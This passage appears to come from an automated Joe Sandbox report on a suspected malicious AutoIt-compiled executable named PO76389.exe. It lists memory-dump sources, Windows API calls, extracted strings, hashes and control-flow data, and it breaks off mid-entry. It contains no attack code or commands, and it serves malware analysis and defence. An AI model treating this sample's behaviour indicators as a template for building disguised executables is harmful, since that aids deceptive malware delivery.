                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                    • Instruction ID: 85ba8ee9e22b84a81c83e00aca906ea829c43fa5b11b258444ac988d1c55c40e
                                                    • Opcode Fuzzy Hash: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                    • Instruction Fuzzy Hash: 84117974200701BFEB258F66FC4AF677BB9EBC9B42F208469F40296290DB71DD049A70
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 005EB1CA
                                                    • GetProcAddress.KERNEL32(?,005E4FF9), ref: 005EB1E8
                                                    • ExitProcess.KERNEL32(?,005E4FF9), ref: 005EB1F9
                                                    • VirtualProtect.KERNEL32(004B0000,00001000,00000004,?,00000000), ref: 005EB247
                                                    • VirtualProtect.KERNEL32(004B0000,00001000), ref: 005EB25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                    • String ID:
                                                    • API String ID: 1996367037-0
                                                    • Opcode ID: c7dc20cb1284afce3b4b7a026ead05358fc87aaf93e70ccc72ee03ac72abfe20
                                                    • Instruction ID: 68a8ce97f1434f56ce02bf239929420db7150a834357713ce21dd9d88a222cda
                                                    • Opcode Fuzzy Hash: c7dc20cb1284afce3b4b7a026ead05358fc87aaf93e70ccc72ee03ac72abfe20
                                                    • Instruction Fuzzy Hash: E651F572A543925BE72D9AB9CCD46677FA0FB51332B180B39C6E1C73C6E7906805C7A0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(004BC848,004BC848), ref: 004CDDA2
                                                    • FindFirstFileW.KERNEL32(004BC848,?), ref: 00524A83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesFindFirst
                                                    • String ID:
                                                    • API String ID: 4185537391-0
                                                    • Opcode ID: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                    • Instruction ID: bff4dc4306f6731882c783e2631efd6a385da51ec33d4cc740d4dc8f3d4b0b1f
                                                    • Opcode Fuzzy Hash: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                    • Instruction Fuzzy Hash: 1CE0D8318144116742146738FC4D8EE7B7D9E06338B10071AF836C21E0E7749D55D9FA
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                    • timeGetTime.WINMM ref: 004BE51A
                                                    • TranslateMessage.USER32(?), ref: 004BE646
                                                    • DispatchMessageW.USER32(?), ref: 004BE651
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                    • LockWindowUpdate.USER32(00000000), ref: 004BE697
                                                    • DestroyWindow.USER32 ref: 004BE6A3
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004BE6BD
                                                    • Sleep.KERNEL32(0000000A), ref: 00525B15
                                                    • TranslateMessage.USER32(?), ref: 005262AF
                                                    • DispatchMessageW.USER32(?), ref: 005262BD
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005262D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 2641332412-570651680
                                                    • Opcode ID: 5bb19eea276869836c2ab51644f807f9c9969321e56d5001faa8a9b42c6a227a
                                                    • Instruction ID: 317cae6480f19941134a8b6f02341eabd4f0fa9d860d4c34ffab7ac9e1c5ddfb
                                                    • Opcode Fuzzy Hash: 5bb19eea276869836c2ab51644f807f9c9969321e56d5001faa8a9b42c6a227a
                                                    • Instruction Fuzzy Hash: E3621170504340DFDB24DF25D885BEA7BE4BF85308F04496EF94A8B292DB78D848DB66
                                                    APIs
                                                    • ___createFile.LIBCMT ref: 004E6C73
                                                    • ___createFile.LIBCMT ref: 004E6CB4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6CDD
                                                    • __dosmaperr.LIBCMT ref: 004E6CE4
                                                    • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6CF7
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6D1A
                                                    • __dosmaperr.LIBCMT ref: 004E6D23
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6D2C
                                                    • __set_osfhnd.LIBCMT ref: 004E6D5C
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6DC6
                                                    • __close_nolock.LIBCMT ref: 004E6DEC
                                                    • __chsize_nolock.LIBCMT ref: 004E6E1C
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6E2E
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6F26
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6F3B
                                                    • __close_nolock.LIBCMT ref: 004E6F9B
                                                      • Part of subcall function 004DF84C: CloseHandle.KERNEL32(00000000,0055EEC4,00000000,?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF89C
                                                      • Part of subcall function 004DF84C: GetLastError.KERNEL32(?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF8A6
                                                      • Part of subcall function 004DF84C: __free_osfhnd.LIBCMT ref: 004DF8B3
                                                      • Part of subcall function 004DF84C: __dosmaperr.LIBCMT ref: 004DF8D5
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6FBD
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E70F2
                                                    • ___createFile.LIBCMT ref: 004E7111
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004E711E
                                                    • __dosmaperr.LIBCMT ref: 004E7125
                                                    • __free_osfhnd.LIBCMT ref: 004E7145
                                                    • __invoke_watson.LIBCMT ref: 004E7173
                                                    • __wsopen_helper.LIBCMT ref: 004E718D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                    • String ID: 9AM$@
                                                    • API String ID: 3896587723-3066932247
                                                    • Opcode ID: cbd20d05c05ea28087eada4c2529a36884401a7497344e17b962426cb1bfce66
                                                    • Instruction ID: fb0d25ed0290265abbe0b3dcbdf6d7870792e50cfe61dd5b9051275790d96148
                                                    • Opcode Fuzzy Hash: cbd20d05c05ea28087eada4c2529a36884401a7497344e17b962426cb1bfce66
                                                    • Instruction Fuzzy Hash: 06225231D002859FEB249E6ADC91BBF7B60EB203A5F25422BE521AB3D1C73D8D40D759

                                                    Control-flow Graph

                                                    APIs
                                                    • _wcscpy.LIBCMT ref: 0050026A
                                                    • _wcschr.LIBCMT ref: 00500278
                                                    • _wcscpy.LIBCMT ref: 0050028F
                                                    • _wcscat.LIBCMT ref: 0050029E
                                                    • _wcscat.LIBCMT ref: 005002BC
                                                    • _wcscpy.LIBCMT ref: 005002DD
                                                    • __wsplitpath.LIBCMT ref: 005003BA
                                                    • _wcscpy.LIBCMT ref: 005003DF
                                                    • _wcscpy.LIBCMT ref: 005003F1
                                                    • _wcscpy.LIBCMT ref: 00500406
                                                    • _wcscat.LIBCMT ref: 0050041B
                                                    • _wcscat.LIBCMT ref: 0050042D
                                                    • _wcscat.LIBCMT ref: 00500442
                                                      • Part of subcall function 004FC890: _wcscmp.LIBCMT ref: 004FC92A
                                                      • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC96F
                                                      • Part of subcall function 004FC890: _wcscpy.LIBCMT ref: 004FC982
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC995
                                                      • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC9BA
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9D0
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 2955681530-2806939583
                                                    • Opcode ID: 489c2bd658fe145c864072f312bbcfc1fc5123079a58db1a1198986aa1b4a7dd
                                                    • Instruction ID: 03b2f6ee0750feaedaaa980fac81a034c6b10fd2a161fe55d5a3c531c839662b
                                                    • Opcode Fuzzy Hash: 489c2bd658fe145c864072f312bbcfc1fc5123079a58db1a1198986aa1b4a7dd
                                                    • Instruction Fuzzy Hash: 88919271504705AFCB20EF51C955F9EB7E8BF84318F00485EF945972A2EB38EA48CB5A

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004CEA39
                                                    • __wsplitpath.LIBCMT ref: 004CEA56
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcsncat.LIBCMT ref: 004CEA69
                                                    • __makepath.LIBCMT ref: 004CEA85
                                                      • Part of subcall function 004D2BFF: __wmakepath_s.LIBCMT ref: 004D2C13
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • _wcscpy.LIBCMT ref: 004CEABE
                                                      • Part of subcall function 004CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                    • _wcscat.LIBCMT ref: 005232FC
                                                    • _wcscat.LIBCMT ref: 00523334
                                                    • _wcsncpy.LIBCMT ref: 00523370
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                    • String ID: '/O$Include$\$"W
                                                    • API String ID: 1213536620-347652088
                                                    • Opcode ID: 3ecd232318733e4027ff582f0f7bc8d6e09b9edd9f15f958d9332b70517bc4df
                                                    • Instruction ID: 5bab6466ce6671c34c39b5b83ffde48aff3be5f7a130da88f229b09927cb8669
                                                    • Opcode Fuzzy Hash: 3ecd232318733e4027ff582f0f7bc8d6e09b9edd9f15f958d9332b70517bc4df
                                                    • Instruction Fuzzy Hash: 42519EB54043409BC314EF5AFC95C9AB7E8FB69304F40091FF54987261EB789688EF6A

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                    • _wcscpy.LIBCMT ref: 004B43C0
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0052214E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO76389.exe$CMDLINE$CMDLINERAW
                                                    • API String ID: 861526374-950967602
                                                    • Opcode ID: e723d0f4a94f6b41af66d3479709beb5ce9b624f7f630ccada7a4d877ccddf49
                                                    • Instruction ID: 47bb017c9f432d4337db13d9659dad45d83ed8d4409e47c35f9c402ef419a79b
                                                    • Opcode Fuzzy Hash: e723d0f4a94f6b41af66d3479709beb5ce9b624f7f630ccada7a4d877ccddf49
                                                    • Instruction Fuzzy Hash: 4081C272900119AACB04EBE5DC52EEF7BB8EF55318F50001FE541B7092EF686A08DB79

                                                    Control-flow Graph

                                                    control_flow_graph 991 4fc890-4fc940 call 4e0650 call 4d010a call 4b4bce call 4fc6a0 call 4b41a7 call 4d2203 1004 4fc946-4fc94d call 4fce59 991->1004 1005 4fc9f3-4fc9fa call 4fce59 991->1005 1010 4fc9fc-4fc9fe 1004->1010 1011 4fc953-4fc9f1 call 4d297d call 4d1943 call 4d1914 call 4d297d call 4d1914 * 2 1004->1011 1005->1010 1012 4fca03 1005->1012 1013 4fcc53-4fcc54 1010->1013 1015 4fca06-4fcac2 call 4b417d * 8 call 4fd009 call 4d4129 1011->1015 1012->1015 1016 4fcc71-4fcc7f call 4b4fd2 1013->1016 1050 4fcacb-4fcae6 call 4fc6e4 1015->1050 1051 4fcac4-4fcac6 1015->1051 1054 4fcaec-4fcaf4 1050->1054 1055 4fcb78-4fcb84 call 4d4274 1050->1055 1051->1013 1056 4fcafc 1054->1056 1057 4fcaf6-4fcafa 1054->1057 1062 4fcb9a-4fcb9e 1055->1062 1063 4fcb86-4fcb95 DeleteFileW 1055->1063 1059 4fcb01-4fcb1f call 4b417d 1056->1059 1057->1059 1067 4fcb49-4fcb5f call 4fc07d call 4d373e 1059->1067 1068 4fcb21-4fcb27 1059->1068 1065 4fcc2e-4fcc42 CopyFileW 1062->1065 1066 4fcba4-4fcc1b call 4fd10c call 4fd134 call 4fc251 1062->1066 1063->1013 1070 4fcc56-4fcc6c DeleteFileW call 4fcfc8 1065->1070 1071 4fcc44-4fcc51 DeleteFileW 1065->1071 1066->1070 1087 4fcc1d-4fcc2c DeleteFileW 1066->1087 1084 4fcb64-4fcb6f 1067->1084 1073 4fcb29-4fcb3c call 4fc81a 1068->1073 1070->1016 1071->1013 1082 4fcb3e-4fcb47 1073->1082 1082->1067 1084->1054 1085 4fcb75 1084->1085 1085->1055 1087->1013
                                                    APIs
                                                      • Part of subcall function 004FC6A0: __time64.LIBCMT ref: 004FC6AA
                                                      • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                    • __wsplitpath.LIBCMT ref: 004FC96F
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcscpy.LIBCMT ref: 004FC982
                                                    • _wcscat.LIBCMT ref: 004FC995
                                                    • __wsplitpath.LIBCMT ref: 004FC9BA
                                                    • _wcscat.LIBCMT ref: 004FC9D0
                                                    • _wcscat.LIBCMT ref: 004FC9E3
                                                      • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC71D
                                                      • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC72C
                                                    • _wcscmp.LIBCMT ref: 004FC92A
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCB8D
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC24
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC3A
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC4B
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                    • String ID:
                                                    • API String ID: 152968663-0
                                                    • Opcode ID: 4a5209259add9fcd4b50de93f1960a280f96b4825bc323e04f20801b2ffb6f02
                                                    • Instruction ID: aba585fc70bae1c10a142ea9f2bc4dd08ece9326de4a3c74e63334a1cb58d018
                                                    • Opcode Fuzzy Hash: 4a5209259add9fcd4b50de93f1960a280f96b4825bc323e04f20801b2ffb6f02
                                                    • Instruction Fuzzy Hash: A4C12BB1D0011DAACF10DFA5CD81AEEB7BDAF99314F0040ABF609E6251D7749A84CF69

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                    • LoadIconW.USER32(00000063), ref: 004B30D5
                                                    • LoadIconW.USER32(000000A4), ref: 004B30E7
                                                    • LoadIconW.USER32(000000A2), ref: 004B30F9
                                                      • Part of subcall function 004B318A: LoadImageW.USER32(004B0000,00000063,00000001,00000010,00000010,00000000), ref: 004B31AE
                                                    • RegisterClassExW.USER32(?), ref: 004B3167
                                                      • Part of subcall function 004B2F58: GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                      • Part of subcall function 004B2F58: RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                      • Part of subcall function 004B2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2FC6
                                                      • Part of subcall function 004B2F58: LoadIconW.USER32(000000A9), ref: 004B3009
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 2880975755-4155596026
                                                    • Opcode ID: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                    • Instruction ID: ceff5d561b1f5500a7b4d7e3c97798467ef73b2f795052532df841ffe39be754
                                                    • Opcode Fuzzy Hash: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                    • Instruction Fuzzy Hash: 6C214470D10704ABCB109FADFD09A99BFF5FB54310F10412AE208A62A0D3744588FF69

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                    • RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2FC6
                                                    • LoadIconW.USER32(000000A9), ref: 004B3009
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 975902462-1005189915
                                                    • Opcode ID: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                    • Instruction ID: 5732ac73bcce4ec07050f3c90708185e54734cc243cb693dfc17334f7716fe69
